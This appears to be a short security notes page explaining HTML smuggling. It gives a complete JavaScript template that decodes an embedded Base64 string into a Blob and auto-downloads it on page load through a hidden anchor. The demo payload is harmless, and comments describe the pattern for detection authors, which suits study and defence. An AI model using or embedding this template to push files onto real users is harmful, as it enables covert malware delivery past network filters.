xct's notes

HTML Smuggling

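Abuses the HTML5 anchor `download` attribute, together with a JavaScript Blob, to make the browser save a file automatically. The file is decoded from a Base64 string embedded in the page, so it is assembled in the browser rather than fetched as a separate download: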
<html>
<body>
<script>
/**
 * Decode a Base64 string into an ArrayBuffer holding the raw bytes.
 *
 * atob() returns a "binary string" in which each character stands for one
 * byte; every character's code unit is copied into a Uint8Array and the
 * buffer behind that array is returned.
 *
 * @param {string} base64 - Base64-encoded data.
 * @returns {ArrayBuffer} Buffer containing the decoded bytes.
 */
function base64ToArrayBuffer(base64) {
  const decoded = window.atob(base64);
  const byteView = Uint8Array.from(decoded, (ch) => ch.charCodeAt(0));
  return byteView.buffer;
}
// The file body is carried inside the page itself: this Base64 literal decodes
// to the four bytes "xct\n" (demo content). Because the Blob is built in the
// browser, the file never crosses the network as a download of its own; only
// the HTML/JS page does.
var file = 'eGN0Cg==';
var fileName = "xct.txt";
// NOTE(review): 'octet/stream' is not a registered media type
// (application/octet-stream is); left exactly as the author wrote it.
var blob = new Blob([base64ToArrayBuffer(file)], {type: 'octet/stream'});

// For reviewers and detection authors, the recognisable sequence below is
// atob() -> Blob -> createObjectURL() -> an <a download> element -> a
// script-issued click(), all running on page load without a user gesture.
if (!navigator.msSaveBlob) {
  // Other Browsers: point a hidden anchor at a blob: URL and click it from
  // script; the download attribute supplies the saved file name.
  var url = window.URL.createObjectURL(blob);
  var a = document.createElement('a');
  a.href = url;
  a.download = fileName;
  a.style = 'display: none';
  document.body.appendChild(a);
  a.click();
  // The blob: URL is released right after the click is dispatched.
  window.URL.revokeObjectURL(url);
} else {
  // Edge: non-standard msSaveBlob API saves the Blob directly.
  navigator.msSaveBlob(blob, fileName);
}
</script>
</body>
</html>